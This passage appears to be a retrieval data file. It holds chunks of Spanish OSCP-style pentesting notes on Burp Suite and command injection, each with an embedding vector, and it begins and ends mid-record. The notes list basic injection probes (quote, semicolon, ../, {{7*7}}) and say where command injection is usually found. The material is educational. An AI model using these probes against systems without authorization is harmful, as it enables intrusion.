-0.02144, -0.0383, -0.05447, -0.06545, -0.03895, 0.1037, -0.12871, 0.03063, -0.06412, 0.10062, 0.04394, -0.03834, 0.06081, 0.02552, -0.08707, -0.00827, 0.0256, -0.00311, 0.00711, 0.01842, 0.0855, -0.00418, -0.0595, 0.10086, 0.08439, -2e-05, -0.10638, 0.05737, 0.09372, 0.04332, -0.04644, 0.04054, -0.02444, -0.0706, -0.02763, -0.06933, -0.0146, 0.0304, -0.05774, -0.05821, 0.01105, 0.04957, -0.06516, -0.02595, 0.07042, -0.10579, 0.09114, -0.02054, 0.02622, -0.08222, -0.00673, -0.04389, -0.0576, -0.09072, 0.00649, 0.07737, -0.01815, 0.0166, 0.02237, 0.02545, 0.03692, 0.04782, 0.00943, 0.05899, 0.05062, 0.02845, -0.07675, -0.01836, 0.01038, 0.0601, 0.00886, 0.00329, 0.00886, 0.01657, -0.03877, 0.01159, -0.09131, -0.03629, 0.05647, 0.03539, 0.05524, -0.0046, -0.0334, -0.01777, -0.03793, -0.0251, -0.05349, -0.02148, 0.03475, 0.02076, -0.05055, -0.09637, 0.00396, 0.05076, -0.01255, -0.01829, -0.07847, -0.03544, -0.00882, -0.12107, -0.00011, 0.03154, 0.11617, 0.0538, -0.06602, 0.02539, 0.10111, 0.04978, -0.01819, 0.07202, 0.00173, 0.00112, -0.01182, -0.04499, 0.00859, -0.04266, -0.05294, 0.02428, 0.01643, -0.05117, -0.04427, -0.03584, -0.03743, 0.0058, 0.02434, 0.01076, 0.0189, -0.01027, 0.01249, 0.03547, -0.00627, 0.05109, -0.0463, 0.01555, -0.0419, 0.0086, 0.06656, 0.01986, -0.00835, 0.01602, 0.07099, 0.04838, 0.02339, 0.03682, 0.03757, 0.04403, -0.03443, -0.02946, 0.03561, 0.03526, 0.03168, -0.02213, -0.09318, 0.04213, 0.02591, -0.01157, 0.01982, -0.04842, -0.04303, 0.05176, -0.02401, 0.00581, -0.05451, -0.04348, -0.01779, -0.06245, 0.03731, 0.00998, -0.00888, -0.01556, 0.03544, -0.04788, -0.09107, 0.06304, -0.01528]} +{"tipo": "metodologia", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "texto": "# Burp Suite\n\n> El proxy de interceptación: se pone **entre tu navegador y la web** para ver y **modificar** cada petición. La herramienta nº1 del Hacking web. Instalado en `tu carpeta`.", "v": [0.09134, 0.00638, -0.26298, -0.2215, 0.06945, -0.18661, 0.01935, 0.00938, -0.05014, -0.01841, -0.06571, -0.05822, -0.01036, -0.07125, -0.06416, 0.06443, -0.00676, -0.1056, 0.06661, 0.0006, -0.00399, 0.14813, -0.09162, -0.00027, -0.10651, -0.02357, -0.05882, 0.04747, -0.10067, -0.04442, -0.10996, -0.02226, -0.01941, 0.07816, -0.10784, -0.07662, 0.09079, -0.04135, 0.05049, 0.08445, 0.07589, 0.07843, -0.10433, 0.0931, 0.02658, -0.04104, 0.0167, -0.06646, 0.03683, -0.00634, -0.00306, -0.11924, -0.16231, 0.02562, -0.03156, -0.08441, 0.21646, -0.14281, 0.01391, -0.09196, 0.0019, -0.01452, -0.06236, -0.00583, 0.06167, -0.07921, 0.00577, -0.09427, -0.06791, 0.08335, 0.04032, -0.03139, 0.03676, -0.04827, 0.07812, -0.0449, 0.02173, -0.10553, 0.03976, -0.00087, -0.02452, 0.00544, -0.10616, 0.00674, -0.09957, -0.04126, 0.02114, -0.0976, -0.0079, -0.04851, 0.13692, 0.13207, -0.00591, 0.00822, 0.04728, -0.12477, 0.09272, -0.00842, 0.02682, -0.07588, 0.10007, 0.00674, -0.11774, 0.09153, 0.00689, 0.00125, -0.0478, -0.01488, 0.01318, 0.00098, 0.01032, 0.01107, -0.01672, -0.05533, 0.01183, -0.02297, -0.02808, 0.03181, -0.00451, -0.11043, -0.07058, -0.03611, -0.09745, 0.04477, -0.02119, -0.02093, -0.11364, 0.05581, 0.03933, -0.05326, -0.0988, -0.1054, -0.04304, 0.00228, -0.03298, 0.04661, -0.02229, -0.10344, 0.02043, -0.0262, 0.00983, -0.01311, -0.021, -0.01128, 0.05151, 0.06255, 0.0476, -0.03617, -0.0803, -0.0823, 0.04611, 0.0012, -0.02498, -0.02051, -0.05076, 0.05387, -0.05239, -0.10354, -0.0301, -0.01228, -0.05159, -0.04709, 0.05023, 0.06281, -0.03238, -0.08352, -0.07314, 0.0203, 0.0573, 0.02799, -0.01314, 0.01962, -0.02561, -0.07101, -0.01883, -0.00434, -0.03921, -0.05509, 0.00409, -0.03451, 0.03131, -0.00954, 0.04378, 0.01567, -0.0868, -0.02845, 0.03728, 0.04322, -0.02981, 0.05252, 0.03423, 0.06007, -0.05075, 0.04676, 0.02643, 0.00049, -0.05479, -0.09316, 0.06681, -0.00238, -0.04348, -0.05327, 0.0005, -0.057, -0.0437, -0.02198, 0.004, -0.07608, -0.03611, 0.07029, 0.02269, -0.03083, -0.00224, -0.07159, -3e-05, -0.06518, 0.02528, 0.03161, -0.02309, -0.01547, -0.00689, 0.02237, 0.0322, 0.01528, 0.01018, 0.03388, 0.05042, 0.0201, 0.01006, 0.04379, -0.00776, -0.04865, -0.00587, -0.02651, -0.00644, -0.02526, 0.0009, -0.02571, -0.08414, -0.02056, -0.02509, 0.01109, -0.01878, -0.04205, -0.06084, -0.0439, -0.02687, -0.00531, 0.00048, -0.05596, -0.03357, -0.04736, -0.01377, -0.08787, -0.02816, 0.00219]} +{"tipo": "metodologia", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "texto": "## Montar el proxy (lo primero)\n1. Navegador → proxy `127.0.0.1:8080` (usa **FoxyProxy** para alternar rápido).\n2. Instala el certificado CA de Burp: visita `http://burp` → *CA Certificate* → impórtalo en el navegador (sin esto, HTTPS da error).\n3. O usa el **navegador embebido** de Burp (Proxy → Open Browser), ya viene configurado.", "v": [-0.04974, -0.19659, -0.17167, -0.04562, -0.02061, -0.1158, 0.06618, -0.0512, -0.02476, -0.1165, -0.10385, -0.10069, -0.04658, -0.07112, -0.1061, -0.06664, -0.04167, -0.03638, 0.0109, 0.02812, 0.03241, 0.10395, -0.06054, -0.09374, 0.12737, 0.08738, -0.17409, -0.02196, -0.08672, -0.14097, 0.06573, 0.0052, 0.09795, 0.07625, -0.05043, 0.03841, -0.0723, -0.05462, 0.08918, 0.12012, 0.06527, -0.00236, 0.04067, 0.14319, 0.03024, -0.03437, -0.00126, -0.06343, -0.02276, -0.13109, 0.01751, -0.16785, -0.20182, 0.12371, -0.03179, 0.04491, 0.06252, -0.14383, -0.0278, -0.07179, 0.09948, -0.01472, -0.03969, -0.04789, -0.05248, -0.0173, -0.00222, 0.00962, -0.0876, 0.03757, -0.01476, 0.0226, 0.02164, -0.07202, 0.0272, -0.01578, 0.00805, -0.0572, 0.1503, 0.12717, 0.0382, 0.02428, -0.05394, -0.11009, -0.11161, -0.08316, 0.00012, -0.06654, 0.02574, -0.02613, 0.15064, 0.11286, 0.0382, 0.01576, 0.00558, -0.14017, 0.07964, -0.01932, 0.08545, -0.02318, 0.07743, 0.11894, -0.05522, 0.1113, 0.05496, -0.01276, -0.02568, -0.00747, -0.03617, 0.00939, 0.10192, 0.01294, -0.05182, -0.0449, 0.05114, -0.02239, -0.04383, 0.05315, -0.00769, -0.03277, -0.03144, -0.0357, -0.08024, 0.03156, -0.02444, -0.03245, -0.05539, 0.00205, 0.06505, 0.02996, 0.01341, -0.10381, -0.05002, -0.01183, -0.04169, 0.07592, 0.03235, -0.04528, -0.03265, -0.00066, 0.02361, -0.00068, 0.02228, 0.03506, 0.11279, 0.08467, 0.00014, 0.03321, -0.04846, -0.07077, -0.05226, 0.06092, 0.03573, 0.03299, -0.04157, 0.00169, -0.03386, -0.1012, 0.05623, 0.00563, -0.02826, 0.00867, 0.09833, 0.04889, -0.02658, 0.03688, -0.07125, 0.00775, 0.08154, -0.01195, -0.01479, 0.05341, -0.05691, -0.11325, -0.01558, -0.01554, 0.01493, -0.10878, -0.01567, -0.01151, 0.02154, -0.03909, -0.03167, -0.0053, -0.04134, -0.0519, 0.02701, 0.00026, -0.00302, 0.06495, -0.01149, 0.00164, -0.04499, -0.01525, 0.0858, -0.01815, -0.02194, -0.09335, -0.01755, -0.04588, -0.01835, -0.033, 0.0067, -0.02141, 0.03417, -0.02298, 0.0424, -0.06685, -0.02817, 0.05389, -0.00043, -0.05211, 0.01307, 0.01196, -0.02742, -0.00017, 0.022, 0.0479, -0.09281, 0.02453, -0.04505, 0.01101, 0.00786, 0.0115, 0.04905, -0.00031, 0.06198, -0.05605, 0.00327, 0.02729, -0.05565, 0.0101, -0.03644, -0.01893, 0.02396, 0.02273, 0.02359, 0.00244, -0.04598, -0.04642, 0.01392, 0.03344, -0.02509, -0.04307, -0.03747, -0.01549, -0.03794, -0.00302, 0.00899, -0.03097, -0.03697, 0.00134, -0.02619, -0.06582, 0.0121, 0.01742]} +{"tipo": "metodologia", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "texto": "## Las pestañas que usarás\n```\nProxy → Intercept ON/OFF. Capturas y reenvías/modificas peticiones.\nTarget → Site map: el árbol de todo lo que has visitado.\nRepeater → reenviar UNA petición tweakeándola → Burp Repeater e Intruder\nIntruder → automatizar payloads (fuzzing, fuerza bruta) → Burp Repeater e Intruder\nDecoder → URL/base64/hex encode-decode\nComparer → diff entre dos respuestas\n```", "v": [0.02249, -0.10667, -0.31939, -0.01191, 0.09314, -0.01176, 0.02971, -0.04281, 0.02089, -0.08977, -0.15775, -0.03226, -0.0482, -0.0304, -0.03196, -0.05353, -0.10333, 0.03848, 0.04949, -0.13125, 0.04395, 0.07687, -0.10695, -0.05041, -0.01371, 0.04555, -0.13036, -0.04207, -0.11452, -0.02982, -0.00759, 0.00092, -0.01517, 0.02704, -0.2669, -0.02377, -0.00427, 0.04717, 0.02184, 0.09501, -0.04907, 0.11029, -0.18508, 0.16679, -0.03025, 0.00751, -0.04526, 0.08969, 0.00359, -0.02996, -0.05037, -0.1093, -0.15699, 0.00258, -0.06888, -0.13146, 0.10423, -0.024, -0.03941, -0.01453, 0.03292, 0.08579, -0.0161, -0.09065, -0.00395, -0.09213, -0.03231, -0.0245, -0.00558, 0.06267, -0.10167, 0.04721, -0.06035, -0.05416, 0.04523, 0.05311, 0.0186, -0.0757, 0.06774, 0.18323, -0.0399, 0.03462, -0.15338, -0.07532, -0.02704, 0.01944, 0.07708, -0.11326, -0.03202, -0.09973, 0.02656, -0.02723, 0.03911, 0.08785, 0.01643, -0.08819, -0.02093, 0.03358, -0.05307, -0.00293, 0.01863, -0.0076, -0.04781, -0.03626, 0.14253, 0.03363, 0.01074, -0.02653, 0.02032, 0.02559, 0.092, -0.00393, 0.00205, -0.03587, -0.05003, -0.04712, -0.12254, 0.0131, 0.04076, -0.0703, 0.00614, 0.0315, -0.03871, 0.02355, 0.04203, 0.02399, 0.01763, 0.08071, 0.00291, -0.05337, -0.06144, 0.01867, -0.01891, 0.01117, -0.00762, -0.00617, 0.01638, -0.0139, -0.00942, 0.04616, 0.0374, 0.05293, 0.04025, 0.04873, 0.06541, 0.08927, 0.04568, -0.02731, -0.07366, -0.00448, 0.04441, 0.03727, 0.08112, 0.06219, 0.00499, -0.00196, 0.03142, -0.04916, -0.0165, 0.03024, -0.08449, -0.01867, -0.05693, 0.01081, 0.05761, -0.00728, -0.05345, -0.03127, -0.01383, 0.01047, -0.00285, 0.05954, -0.0543, 0.02559, -0.01061, 0.01246, -0.05841, -0.01682, 0.02933, 0.02751, -0.02441, -0.004, 0.02968, 0.02913, 0.02683, -0.06635, 0.02643, 0.0408, -0.00028, -0.01136, 0.02395, 0.00378, 0.01465, 0.03167, 0.00736, 0.00116, -0.03818, 0.06613, -0.00135, -0.10489, 0.00146, -0.06861, -0.04039, -0.03903, 0.00855, -0.00791, 0.0389, -0.06964, -0.04749, 0.03464, 0.01272, -0.00686, 0.03109, 0.01444, -0.02299, -0.02875, 0.07553, 0.02631, -0.02077, -0.02669, 0.03156, 0.11824, 0.04228, 0.00654, -0.02433, 0.07666, 0.0786, 0.02048, 0.04767, 0.02406, -0.09121, -0.01874, -0.04176, -0.01931, -0.00796, -0.01572, -0.04487, 0.06191, -0.02006, -0.03824, 0.09515, 0.0127, -0.01588, -0.06721, -0.00596, -0.05774, -0.09325, 0.03673, 0.03799, -0.01245, -0.01329, 0.08027, 0.01984, -0.0378, -0.01945, -0.03074]} +{"tipo": "metodologia", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "texto": "## Atajos clave\n- `Ctrl+R` → enviar petición a **Repeater**\n- `Ctrl+I` → enviar a **Intruder**\n- `Ctrl+Shift+B` → base64", "v": [-0.03669, 0.00277, -0.1397, -0.01559, 0.0378, -0.25519, 0.05363, -0.02045, 0.0571, -0.0634, -0.04995, -0.06497, 0.1076, -0.09977, 0.06866, -0.05381, -0.01612, -0.06974, -0.01773, -0.03287, 0.00425, -0.05026, -0.04052, -0.05404, -0.18654, 0.03532, -0.14923, 0.01352, -0.02645, 0.01614, 0.01826, -0.05512, -0.00581, 0.06676, -0.01097, -0.0926, 0.01661, 0.02726, -0.05276, 0.08907, 0.01864, 0.12992, -0.17554, 0.23798, -0.05499, -0.02491, 0.15095, 0.09533, 0.05539, -0.01062, -0.03095, -0.11523, -0.09698, -0.13805, -0.09645, -0.08092, 0.20742, -0.00571, -0.06824, -0.05909, 0.06433, 0.11048, -0.06423, 0.10944, -0.02226, -0.06723, 0.09555, -0.06177, -0.10517, 0.16167, -0.14871, 0.03242, -0.1209, 0.00156, 0.04192, -0.00988, -0.03459, -0.06569, 0.1369, 0.07968, -0.05487, -0.0097, -0.0808, -0.09367, 0.00805, -0.06319, 0.06067, -0.08259, -0.07672, -0.06513, 0.09548, -0.05627, 0.08498, 0.02176, 0.04373, -0.03361, 0.00016, -0.04379, -0.00087, 0.00926, 0.0376, -0.04323, -0.0126, 0.03333, 0.12364, 0.01811, 0.01724, -0.07753, 0.00427, 0.05767, 0.06683, 0.01512, 0.08113, 0.01959, -0.01035, -0.02423, 0.00714, -0.0183, 0.02725, -0.01862, -0.03459, -0.0265, -0.07523, 0.08265, -0.02522, 0.02707, -0.04508, -0.00016, -0.07595, -0.01596, -0.03968, -0.00055, 0.00517, -0.0162, 0.06151, 0.10211, 0.02372, -0.04205, -0.01173, -0.03218, 0.03828, 0.09887, 0.05376, -0.00511, 0.0348, 0.10832, 0.08707, -0.02563, -0.055, -0.03718, 0.10839, 0.03325, 0.04213, -0.03628, 0.04437, -0.06741, -0.06049, 0.01496, -0.01516, 0.00249, -0.03892, 0.03764, -0.04324, 0.0834, -0.00328, -0.0476, 0.00538, -0.10525, -0.02523, -0.00405, 0.00373, 0.05923, -0.02542, -0.03909, -0.01757, -0.03448, 0.02162, -0.03138, -0.01106, -0.01134, 0.01733, 0.05088, 0.05154, 0.04624, 0.04263, -0.02893, -0.00584, 0.0149, -0.02557, -0.00852, 0.03427, 0.02049, -0.02408, -0.01222, -0.0349, 0.02916, -0.07513, -0.04975, 0.01593, -0.08994, -0.01278, -0.02941, 0.00837, -0.02629, 0.01381, -0.02046, 0.01067, 0.04166, -0.02735, 0.03827, 0.01001, -0.01661, 0.01113, 0.04551, -0.01966, -0.06112, 0.00986, 0.03496, -0.01242, -0.04336, 0.0571, 0.03543, 0.01231, 0.01451, 0.05168, 0.0464, 0.02834, 0.04959, 0.00225, -0.02101, -0.02014, 0.0559, 0.00646, -0.03323, -0.01891, -0.0418, -0.00599, 0.02707, -0.02949, -0.03308, 0.03865, -0.02208, -0.05835, -0.0377, -0.02672, -0.02274, -0.07298, 0.06168, 0.02695, 0.02669, 0.00273, -0.02519, -0.02448, -0.07692, 0.00255, -0.0003]} +{"tipo": "metodologia", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "texto": "## Community vs Pro (OSCP)\nCommunity vale de sobra para el examen. Limitaciones: **Intruder va ralentizado** y **no hay scanner activo** (que de todas formas está prohibido → Reglas de herramientas). Para fuzzing/fuerza bruta intensiva tira de Content discovery (ffuf) o hydra.", "v": [0.05828, -0.179, -0.21272, -0.14463, 0.02235, -0.1432, -0.04779, 0.01538, -0.03556, -0.09997, -0.13878, -0.10017, 0.01714, 0.07246, 0.06351, 0.04963, -0.07085, -0.08089, -0.13377, -0.01433, 0.0132, -0.03514, -0.05379, -0.11275, -0.00348, -0.10746, -0.10273, 0.09668, -0.09747, -0.06992, 0.06836, 0.02185, 0.16971, -0.04299, -0.12587, -0.0174, -0.03037, -0.01249, 0.10171, 0.1516, 0.06558, 0.1892, -0.04374, -0.05173, 0.03112, -0.0031, -0.10867, 0.10373, -0.06289, 0.10141, -0.15991, -0.05206, -0.07555, -0.01271, -0.01524, -0.14022, -0.07631, -0.0141, -0.06485, -0.0591, -0.00325, -0.00475, -0.07776, -0.11349, -0.06165, -0.0212, -0.03631, -0.02986, -0.04829, 0.0569, -0.01871, -0.07645, -0.03494, -0.10095, -0.08883, -0.09694, -0.04831, -0.04917, 0.09187, -0.03538, -0.06662, -0.0094, -0.05502, -0.08718, -0.13908, -0.17396, 0.02654, -0.07042, -0.05828, -0.06791, 0.11492, 0.01254, 0.01702, 0.02337, 0.05023, -0.00656, 0.02222, 0.10105, 0.00405, 0.00535, 0.08925, 0.00157, -0.05654, -0.02935, 0.02578, 0.01369, 0.00069, -0.02505, 0.03153, 0.02344, 0.0349, 0.00302, -0.01805, -0.05065, -0.00311, 0.01517, -0.05764, -0.03586, 0.04059, 0.00603, -0.01064, 0.01231, -0.03103, 0.00136, 0.03363, -0.00152, 0.00824, 0.06277, 0.01717, -0.0477, -0.01093, 0.09776, 0.01361, -0.08224, -0.05847, 0.02553, -0.01304, -0.02691, -0.08393, -0.06931, 0.04004, 0.029, 0.01564, -0.00658, 0.09236, -0.01589, -0.00561, -0.05804, -0.10161, -0.00901, -0.02594, -0.00978, 0.01569, 0.06564, 0.00493, -0.05045, 0.05937, -0.0353, 0.01593, 0.04333, -0.0564, 0.00542, -0.00273, -0.00633, 0.03091, 0.05373, -0.08564, -0.06358, -0.04208, -0.09774, 0.00428, -0.02252, -0.01371, -0.00021, 0.10708, -0.06211, -0.00449, -0.0905, -0.04345, -0.08969, -0.02726, -0.01755, -0.00638, 0.02684, 0.02965, 0.00844, 0.04288, -0.04108, 0.08314, 0.00436, 0.02666, 0.01615, -0.06852, 0.00611, 0.01107, 0.02115, 0.02845, -0.04887, 0.03629, -0.06157, -0.00381, 0.00052, -0.01681, -0.02777, -0.03887, 0.02217, 0.00522, 0.03705, -0.04068, 0.01493, 0.03881, -0.01135, -0.00977, 0.00206, -0.0537, 0.0134, 0.00213, 0.01038, 0.00537, -0.04526, 0.02285, 0.12777, 0.02423, 0.01753, -0.02467, -0.04052, 0.05775, 0.01662, 0.07802, -0.01409, 0.0439, -0.01531, 0.00267, -0.04115, 0.03287, 0.03919, 0.04024, 0.05652, -0.06962, -0.07916, 0.05398, 0.03801, 0.03812, -0.00711, -0.1157, 0.02114, -0.03192, 0.00399, -0.05659, -0.04281, 0.02001, -0.02059, 0.04639, -0.10184, 0.03852, -0.02603]} +{"tipo": "metodologia", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "texto": "## Para qué lo usas en cada vector\n- Cambiar `Content-Type` y extensión en File upload bypass.\n- Manipular cookies/headers en Authentication attacks.\n- Probar a mano `'`, `;`, `../`, `{{7*7}}` en SQL injection, Command injection, Directory traversal, SSTI.\n\nRelacionado: Hacking web · OSCP MOC", "v": [-0.04442, -0.03727, -0.02548, -0.12948, 0.04903, -0.293, 0.00195, -0.00667, -0.0374, 0.11239, -0.10531, -0.10111, -0.00405, -0.05558, -0.05339, 0.00016, 0.05814, -0.09344, -0.04749, 0.02002, 0.0835, -0.03063, 0.00768, 0.02079, -0.02104, 0.12368, -0.03913, 0.06608, -0.1654, -0.12631, -0.01348, 0.00721, -0.03875, 0.06141, -0.08875, -0.02489, -0.14208, -0.01418, 0.0073, 0.18568, -0.06094, 0.04484, -0.15948, 0.04837, 0.09014, 0.00589, 0.04758, 0.03577, 0.08331, 0.00713, 0.05648, 0.00288, -0.18141, 0.01972, 0.01362, -0.00439, 0.02917, -0.07617, -0.0113, 0.01979, 0.00323, 0.05345, -0.03077, 0.01374, 0.08158, -0.02876, -0.07129, -0.15236, -0.05563, 0.11384, -0.04726, 0.01405, 0.02605, -0.07258, 0.08339, -0.02157, 0.1181, -0.0217, 0.12752, 0.06312, -0.10423, -0.098, -0.04197, 0.07395, -0.0126, -0.01128, 0.05789, -0.05547, 0.0146, -0.02849, 0.18491, -0.01664, -0.07479, -0.0047, -0.00566, -0.079, -0.01947, -0.01132, 0.12448, -0.02554, 0.06467, 0.00555, -0.02194, 0.12323, 0.0722, 0.07522, 0.1163, -0.03742, 0.02703, -0.04306, 0.06537, -0.01606, 0.03906, -0.07062, -0.01188, 0.09298, 0.00803, 0.06113, -0.01304, -0.08462, -0.13751, -0.02699, -0.02761, 0.06319, -0.03416, -0.07774, -0.10772, 0.08635, -0.07598, 0.02837, -0.06803, 0.01772, -0.02466, -0.01167, -0.02375, 0.06946, 0.06196, -0.08185, 0.03132, -0.03033, -0.03178, 0.04089, 0.06286, 0.06162, -0.02201, 0.0098, -0.01115, -0.03384, -0.02948, -0.03051, 0.01213, 0.0378, 0.0458, 0.0107, 0.03309, -0.01981, 0.03424, -0.05726, 0.01457, 0.08772, 0.02682, 0.09057, -0.02207, 0.00856, -0.08033, -0.04906, -0.12116, -0.07107, 0.03677, -0.02716, -0.03504, 0.06404, 0.00126, -0.00415, -0.01383, -0.04136, -0.01435, -0.07229, -0.00475, -0.06087, 0.03185, 0.00754, 0.02166, 0.03625, -0.04145, -0.06879, 0.04637, 0.0334, -0.02692, 0.0663, 0.02658, -0.02869, -0.00614, 0.03182, 0.00398, -0.03187, -0.01033, -0.06404, 0.0366, -0.02385, -0.00489, -0.02041, -0.03125, -0.00511, 0.03794, 0.05815, -0.00173, 0.0177, -0.07483, 0.01043, -0.0173, -0.04472, 0.0083, -0.06508, -0.02238, -0.07245, 0.04476, 0.02602, -0.0359, 0.01777, -0.0285, 0.0451, 0.1089, -0.05249, 0.01356, 0.05914, -0.01114, -0.03553, 0.04412, 0.01874, -0.02846, 0.02956, 0.00517, -0.02651, 0.10444, 0.03456, -0.00473, -0.06305, -0.09032, -0.05183, 0.00334, 0.04451, -0.00427, 0.0227, -0.07868, -0.05592, -0.06808, -0.02859, 0.03624, -0.07645, -0.04119, -0.00951, 0.00132, -0.07149, 0.03448, -0.02099]} +{"tipo": "metodologia", "herramienta": "Command injection", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "texto": "# Command injection\n\n> Un parámetro web acaba dentro de un comando del sistema → ejecutas comandos. RCE directo, vector top del Hacking web.", "v": [0.11798, 0.01807, -0.13561, -0.13755, 0.07134, -0.09091, 0.0522, 0.05059, 0.007, 0.03132, -0.1794, -0.08081, -0.00453, -0.06514, 0.0459, 0.11479, 0.13143, 0.0029, -0.01357, -0.12414, 0.03572, -0.0262, 0.01527, -0.05337, 0.01593, 0.07578, -0.04351, 0.07893, -0.15786, -0.14376, -0.03778, 0.05433, 0.02906, -0.05126, -0.11916, -0.00621, -0.03179, 0.00729, 0.05388, 0.20304, -0.14174, 0.06427, -0.20652, 0.00216, 0.04354, -0.03881, 0.14525, -0.06777, 0.1513, -0.11911, 0.0365, -0.00382, -0.12144, -0.01032, -0.0479, -0.09165, 0.06654, -0.04338, -0.00802, -0.09869, 0.01398, -0.04518, 0.04498, 0.02742, -0.03398, 0.03721, -0.0308, -0.1776, 0.03516, 0.04727, -0.06056, 0.05304, -0.0492, 0.09614, 0.06888, -0.09186, 0.001, 0.00809, 0.1078, 0.01014, -0.03246, 0.00944, -0.10312, 0.03437, -0.00475, -0.03063, -0.03749, -0.08483, -0.00788, -0.04309, 0.06853, -0.0433, -0.00917, 0.06483, 0.09413, -0.05199, 0.01002, -0.00827, 0.03127, -0.06222, 0.03027, -0.04592, -0.17541, 0.12412, 0.05696, 0.07499, 0.06877, -0.03827, 0.05233, -0.02155, 0.02488, -0.07743, -0.0144, -0.05309, -0.06574, -0.04231, -0.03487, 0.02921, -0.00583, -0.08755, -0.1946, 0.04797, -0.00639, 0.06593, -0.01859, 0.00414, -0.04303, 0.01156, 0.0612, 0.01164, -0.04665, -0.02671, 0.04938, -0.06507, -0.03921, 0.12991, -0.00134, 0.00051, -0.09999, -0.09724, 0.00059, 0.05502, -0.00028, 0.03733, 0.05512, -0.04594, 0.07232, -0.07994, -0.0343, 0.00484, 0.04752, 0.06868, -0.09384, 0.00994, -0.01896, -0.06542, -0.02391, -0.06297, -0.03553, 0.04665, -0.03268, -0.01253, -0.04982, 0.02978, -0.0512, -0.03138, -0.04633, 0.00193, -0.01391, 0.02125, 0.01131, 0.09178, -0.02098, -0.05004, 0.03057, -0.01962, -0.00256, -0.04589, 0.02526, 0.01179, 0.01558, 0.04321, -0.02554, 0.02269, -0.03507, -0.03051, -0.01976, 0.05472, -0.01775, 0.08952, 0.02161, 0.04859, -0.01719, 0.05015, 0.03692, 0.00712, 0.00374, -0.02333, -0.03998, -0.06266, -0.06975, 0.04064, 0.01617, -0.08944, -0.01237, -0.0167, 0.01391, 0.03839, -0.02222, 0.03591, -0.0112, -0.02614, 0.04785, -0.02533, -0.01464, -0.04288, 0.03479, -0.00105, -0.02002, -0.02488, -0.009, -0.00128, 0.06129, -0.01275, 0.03512, 0.01945, -0.05275, -0.00942, 0.04899, 0.01687, -0.03448, -0.07384, 0.0031, -0.01969, 0.00613, -0.01087, -0.00583, 0.0395, -0.05168, -0.05572, 0.01334, 0.07503, 0.01572, -0.05927, -0.04764, -0.09013, -0.06796, -0.02937, -0.00159, -0.04421, -0.03075, 0.02082, -0.03355, -0.05146, -0.08104, -0.02093]} +{"tipo": "metodologia", "herramienta": "Command injection", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "texto": "## Dónde aparece\nFunciones que \"hacen algo\" con tu input: `ping`, `nslookup`, convertir imágenes, export, backup, \"test connection\".", "v": [-0.0636, 0.22647, -0.17748, -0.11963, -0.01041, -0.12686, -0.06713, 0.01739, 0.00693, -0.11139, -0.08802, -0.13583, -0.1141, 0.01262, -0.12602, -0.10842, -0.03086, 0.04143, 0.06384, -0.01356, 0.05505, 0.0188, -0.09411, -0.04227, 0.08526, 0.01992, -0.05558, 0.10121, -0.10251, 0.01533, 0.04277, -0.0859, 0.07185, 0.02194, -0.13402, -0.03542, 0.07422, 0.02328, 0.08071, 0.14041, -0.01995, 0.03053, -0.10902, 0.03908, 0.01863, -0.10291, 0.07591, -0.01587, 0.06355, -0.04134, -0.02945, 0.02064, 0.00925, -0.04588, -0.01347, -0.07692, 0.07014, -0.04267, 0.06173, -0.00958, -0.04619, 0.15856, 0.00711, -0.10964, 0.11535, -0.00557, -0.04969, -0.02252, -0.03357, -0.02747, -0.09693, 0.07367, 0.02091, -0.06139, 0.0559, -0.0191, 0.09903, -0.08296, -0.00895, 0.04879, -0.04349, -0.09261, 0.00912, 0.07934, -0.02485, -0.06153, 0.01971, -0.02016, -0.02243, -0.09608, 0.07805, 0.01607, 0.00873, -0.00518, -0.041, 0.01448, -0.04529, -0.06062, -0.0055, -0.00195, 0.01175, 0.12613, -0.10242, 0.10006, 0.064, 0.00053, 0.1275, -0.05908, -0.01624, 0.01781, 0.10907, -0.00379, -0.02555, -0.14872, -0.09638, -0.05338, -0.04202, -0.06999, 0.01458, 0.01947, 0.01204, -0.08581, 0.03337, -0.03394, -0.01456, -0.05434, -0.04719, 0.02858, -0.01307, 0.01151, -0.00651, 0.02805, -0.04056, -0.04716, -0.0242, -0.03318, 0.08071, -0.03402, 0.02368, -0.08214, -0.02937, 0.02146, 0.08434, -0.04204, -0.00899, 0.09304, 0.06897, -0.05843, -0.11561, 0.03724, 0.01533, -0.00441, -0.03073, -0.03779, 0.05468, 0.00983, 0.01485, -0.04608, -0.06797, -0.03301, 0.00696, 0.05216, 0.10762, 0.04545, 0.0441, -0.00663, -0.05615, -0.09437, 0.04529, -0.09944, -0.00976, -0.01985, -0.11107, -0.14621, 0.07912, 0.01714, 0.02263, -0.06258, 0.02877, -0.04999, 0.03992, 0.03249, -0.04567, 0.02231, 0.01764, -0.03747, 0.01771, 0.07226, 0.05409, -0.05678, -0.01145, 0.04723, -0.03617, -0.04007, 0.07738, -0.04015, -0.04429, -0.03248, 0.04355, -0.02496, -0.02428, -0.09938, -0.01371, -0.04142, 0.00449, 0.07871, -0.08188, 0.04753, -0.04984, 0.00521, -0.0392, -0.01131, 0.05657, -0.02629, -0.08103, -0.00411, 0.00343, 0.01355, -0.05529, -0.00822, -0.02352, 0.07637, 0.09098, 0.03754, -0.01527, 0.04228, 0.02179, 0.02903, 0.00224, 0.04627, -0.03059, 0.06937, -0.0515, -0.02965, 0.07918, -0.02917, -0.03507, -0.03407, -0.04268, -0.11146, 0.01656, 0.05495, -0.05459, -0.02612, -0.0636, 0.0234, -0.03567, 0.03258, 0.07078, -0.10681, 0.0062, 0.00768, 0.04964, -0.04895, 0.06529, -0.02567]} +{"tipo": "metodologia", "herramienta": "Command injection", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": 